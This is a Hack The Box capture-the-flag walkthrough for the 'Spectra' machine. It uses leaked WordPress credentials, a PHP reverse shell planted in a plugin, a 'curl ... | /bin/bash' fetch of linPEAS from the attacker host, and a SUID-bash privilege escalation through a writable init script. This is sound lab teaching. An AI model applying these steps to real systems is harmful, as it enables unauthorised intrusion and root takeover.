---
title: "Htb Spectra"
date: 2021-04-30T10:23:40-07:00
draft: true
---

![](/img/htb-spectra-title-card.png)
Spectra is a virtual machine on the Hack The Box platform with a difficulty rating of **Easy**. If one follows the right methodology  exploiting this machine can be a very quick process. Let's dive in.

# Enumeration

To get a good overview of the services available I like to run [autorecon](https://github.com/Tib3rius/AutoRecon):

	autorecon.py --single-target 10.10.10.229
	
Eventually nmap will reveal three ports open.

![](/img/htb-spectra-port-scan-results.png)

|Port|Service|Version|
|---|:---|---|
|22|SSH|OpenSSH 8.1|
|80|HTTP|nginx 1.17.4|
|3306|MySQL|

Let's start by visiting the web service on port 80.

![](/img/htb-spectra-frontpage.png)

Both URLS refer to the hostname spectra.htb so this is a good reminder to add that to /etc/hosts.

![](/img/htb-spectra-etc-hosts.png)

The second of the two URLs redirects to http://spectra.htb/testing/index.php and a database error

![](/img/htb-spectra-testsite-error.png)

There doesn't seem anything useful to be done with this error but perhaps there's information to be gleaned from the /testing/ directory. Visiting it shows that directory listing is enabled and most of the files have .php extensions except one, **wp-config.php.save**

![](/img/htb-spectra-testing-dirlisting.png)

Because it ends in .save the web server likely won't pass it to the PHP interpreter, giving us a view of its contents.

Let's use the curl command to see the raw contents of the file.
`curl http://spectra.htb/testing/wp-config.php.save`
![](/img/htb-spectra-curl-wp-config-save.png)

The file reveals some stored database credentials. 
|||
|--|:--|
|DB Name|**dev**|
|DB User|**devtest**|
|DB Password|**devteam01**|

My first instinct is to try these credentials against the MySQL service that's exposed on default port 3306, however I quickly learn remote access from my host is blocked.

![](/img/htb-spectra-mysql-error.png)

Let's continue our enumeration of the web server.

Following the first link from the root directory takes us to http://spectra.htb/main/index.php, a wordpress site.

![](/img/htb-spectra-wordpress-frontpage.png)

Further down, under "Meta" is a log in link. Let's go there.

![](/img/htb-spectra-wp-login-link.png)

From the front page contents we know that user **administrator** exists and we have a password from the "testing" site. Let's try the combination **administrator / devteam01**

![](/img/htb-spectra-wp-login.png)

And we're in! Next step is to establish a foothold via a reverse shell. 

# Foothold 

A common way is to replace a template file, say for the 404 error message. I found that trying this approach generated errors so I tried another approach, modifying a plugin. First we'll ensure the plugin is disabled since editing an active plugin will probably fail. Go to **Plugins -> Installed Plugins**

![](/img/htb-spectra-wb-installed-plugins-link.png)

The Akismet plugin should already be deactivated but in case it isn't, click the **deactivate** link here.
![](/img/htb-spectra-wp-deactivate-plugin.png)

Now we're ready to add our reverse shell code. Navigate to **Plugin Editor**
![](/img/htb-spectra-plugin-editor-link.png)

Select **index.php** from the list of files on the right. On a shell in our attacking machine we'll adapt a php reverse shell to paste into this file.

We'll use the php-reverse-shell.php file available on Kali (/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php) or on [pentestmonkey's github page](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). Copy it to our working directory and edit the IP address and port to match our attacking machine IP and desired reverse shell port.

![](/img/htb-spectra-php-rev-sh-edit.png)

Then paste the entire contents of our modified file into index.php in the plugin editor and click **Update File**
![](/img/htb-spectra-wp-update-plugin.png)

If all goes well you should see the message *File edited successfully.* If not it likely means the plugin is active so verify that it's deactivated.
![](/img/htb-spectra-wb-file-edited-successfully.png)

The plugin is still deactivated at this point so let's reactivate it. Click **Installed Plugins** again and then **Activate** the Akismet plugin.

![](/img/htb-spectra-wp-activate-akismet.png)

Now launch a netcat listener on the chosen port: `rlwrap nc -nlvp 8888`

and in the web browser visit http://spectra.htb/main/wp-content/plugins/akismet/

We now have a shell as user **nginx**

![](/img/htb-spectra-shell-as-nginx.png)

# Post-Exploit Enumeration as *nginx*

One useful piece of information to have early on is a list of users on the system with shell access. `grep "sh$" /etc/passwd`

It looks like the answer is **root, chronos, nginx, and katie**
![](/img/htb-spectra-shell-users.png)

To save time in the enumeration process we'll call on [linPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), an excellent enumeration script. First copy the script to our attacking machine, then run a simple python HTTP server on port 80.

```
$ git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
# This creates a linpeas.sh symlink in our current directory
$ ln -s privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
$ sudo python3 -m http.server 80
```

![](/img/htb-spectra-simple-server.png)

In our reverse shell curl linpeas.sh from our attacking machine and pipe it to bash: `curl 10.10.14.17/linpeas.sh | /bin/bash`
![](/img/htb-spectra-curl-linpeas.png)

Here we learn that the OS running on spectra is **Chromium**
![](/img/htb-spectra-os-id.png)

Linpeas finds an autologin password **SummerHereWeCome!!** at /etc/autologin/passwd

![](/img/htb-spectra-autologin-passwd.png)

Let's see if password reuse is again at play here. If we try to ssh as root to the machine with this password we'll fail, but it's a different story with **katie**

![](/img/htb-spectra-katie-ssh.png)

Collect the user.txt file at **/home/katie/user.txt** and let's move along to finding the next privilege escalation step!

# Post-Exploit Enumeration as *katie*
One of the first things I do with a new user login is check its sudo privileges: `sudo -l`

Doing this we find that katie has privileges to run initctl. 

![](/img/htb-spectra-sudo-l-katie.png)

Initctl is a daemon control tool and it allows us to start and stop the service control scripts that reside in **/etc/init/**. First let's see if there are any files in /etc/init that are owned by the group `developers`, which katie belongs to

![](/img/htb-spectra-find-init.png)

Confirming our access to these files with `ls -l /etc/init/test*`
![](/img/htb-spectra-ls-init.png)

So our user
- has permission to restart service scripts (which run as root)
- has membership in the **developers** group
- The **developers** group owns the /etc/init/test* scripts

This seems like a recipe for privilege escalation.

Picking one of the test scripts at random, let's edit /etc/init/test7, adding the line `chmod +s /bin/bash` to the script block. 

![](/img/htb-spectra-edit-init-test.png)

Next step is to initiate the **test7** script and run our newly-minted **SUID root** bash executable. The SUID bit will set the effective UID (EUID) to 0 (root); we want to run bash with the "-p" argument to preserve this EUID so we get the root shell we desire.

```
sudo initctl start test7
bash -p
```

![](/img/htb-spectra-privesc-to-root.png)

Congrats, you've gotten a root shell! Be sure to collect root.txt and submit it!

Thanks for reading!